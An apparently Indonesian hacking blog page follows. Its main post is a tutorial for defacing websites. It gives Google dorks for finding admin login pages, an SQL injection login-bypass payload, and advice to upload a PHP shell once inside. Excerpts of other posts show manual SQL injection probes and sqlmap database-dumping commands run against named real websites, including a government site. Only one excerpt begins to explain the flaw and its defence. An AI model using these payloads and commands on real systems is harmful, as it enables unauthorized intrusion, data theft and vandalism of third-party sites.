Tutor deface bypass admin

-

      Haii fans :V, M0usanonoy in here,gw mau share tutorial deface bypass admoon
Bahan:
1.amplas(buat coli):V
2.Dork (dibawah)
3.shell extensi .php atau php.xxjpgg
4.kegantengan and kesabaran
  Dork:
  1. inurl:/admin site:in
  2. intext:"password" inurl:/admin site:in
  3. inurl:/panel/index.php
  4. intitle:"administrator" site:in
  5. inurl:/panel intext:"Parent Directory"
  6. intitle:"login" inurl:/administrator site:uk
  7. inurl:/panel intext:"Parent Directory" intitle:"/image site:in
  8. intitle:"administrator" inurl:/login.php site:in
  9. intext:"username" intitle:"login"

ok lngsung ajh bosku.

1.dorking ke google semisal gw pake dork:
  1. intitle:"administrator" site:in
2.isi username sama pasword pake:
  1. '="or'

3.jika vuln maka akan lngsung ke control panel/admin panel web tersebut.
kalau login gagal cari web yng lain(kesabaran di utamakan muehehe:V)

4.dan jika berhasil masuk/login terserah kalian mau diapain:)
bisa add/edit news atau upload shell




Comments

Post a Comment

Popular posts from this blog

tutorial deface sql injection

-
Image
Pada Tutorial Kali ini ,Saya akan Share Tutorial Deface Sql Manual dork :  - inurl:/staff.php?id= - inurl:/news.php?id= kembangin sendiri gan. Nah Langsung Aja Karena Saya Udah Nemu Situs Yang Vuln Sql ,Oh iya Untuk Mengetahui Vuln Atau Tidak Kalian Hanya Perlu Masukan tanda ( ' ) di belakang angka Id nya, Contoh : http://www.utama.tegalkab.go.id/artikel.php?id=113' Nah Kek gitu deh, maka muncul  You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 jika sudah ketemu ,kalian tinggal masukan +order+by+1--+- ,Jadinya : http://www.utama.tegalkab.go.id/artikel.php?id=113+order+by+1--+- Kalian Terusin Sampai Ketemu Error ,jadinya http://www.utama.tegalkab.go.id/artikel.php?id=113+order+by+1--+- => Ga error http://www.utama.tegalkab.go.id/artikel.php?id=113+order+by+2--+- Ga error http://www.utama.tegalkab.go.id/artikel.php?id=113+order+by+
Read more

Cara deface Sqlmap live target

-
Image
      Kali ini ane mau posting tentang deface, Yup cara deface dengan SQLMAP di Windows, oke langsung simak aja tutorial nya   Alat perang : > Sqlmap > Python >Google Dork    yng pertama, instal dulu python nya, lalu taro file SQLMAP nya di C:/sqlmap buka CMD, ente pergi ke direktori SQLMAP yang ada di  C:/sqlmap, dengan perintah> cd C:/sqlmap lalu ketikan perintah >sqlmap.py untuk menjalankan SQLMAP  Lalu ketikan Perintah> sqlmap.py -u https://target.com --dbs perintah ini untuk melihat isi database  Contoh:> sqlmap.py -u  https://www.bransonparksandrecreation.com/page.php?id=38  --dbs nah, ada 3 database di situs  https://www.bransonparksandrecreation.com/ Ane pilih database blrpwp, masukan perintah > sqlmap.py -u https://target.com -D nama_db --tables Contoh:>sqlmap.py -u https://www.bransonparksandrecreation.com/page.php?id=38 -D blrpwp --tables ada 34 tables didalem database blrpwp Skrng cari tabel admin/user/auth/login,dll yng b
Read more

Mengapa terjadi bypass admin??

-
Image
Mengapa Terjadi Bypass Admin? @Copyright by  MDaffa15ev Hehe, nyoba cari” di  db-exploit.com/papers  ada post yang menarik judulnya ” [Indonesian] Simple Technique for SQLi Form Login Bypass” buatan si haripinter. Waktu baca” lumayan menarik :V,  bagaimana kok bisa terjadi bypass admin? Ini penjelasan sederhananya. Konten : 1. Pendahuluan 2. Sekilas tentang SQLi pada Form Login 3. Contoh Serangan 4. Penanggulangan Sederhana #1. Pendahuluan SQL Injection merupakan salah teknik eksploitasi web yang cukup lama, namun hingga saat ini teknik tersebut masih cukup mumpuni dan efektif untuk dilakukan. Buktinya saat ini masih ada saja (dan banyak) website yang mengidap penyakit vuln terhadap serangan SQL Injection. Inti dari penyebab bug ini yaitu terletak pada si pembuat web (web programmer), anggap saja ada kesalahan logika berpikir atau ketidaktahuaannya dalam membuat website yang aman. Saya tekankan sekali lagi, masalah bug ini terletak pada diri
Read more